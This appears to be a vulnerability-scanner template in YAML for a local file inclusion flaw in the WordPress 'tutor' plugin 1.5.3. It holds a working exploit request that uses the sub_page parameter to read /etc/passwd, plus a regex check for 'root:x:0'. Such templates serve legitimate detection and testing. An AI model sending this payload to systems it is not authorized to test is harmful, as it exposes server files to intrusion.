product: WordPress
vName: WordPress tutor - Local File Inclusion
type: 文件读取
vID: [ ]
level: 3
vDesc: WordPress tutor.1.5.3 is vulnerable to local file inclusion.
version: 1.5.3
note: ''
search: { }
protocol: http
link: https://www.exploit-db.com/exploits/48058
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd
    verify:
      logic: and
      check:
        - regex:
            value:
              - 'root:x:0'
            logic: and
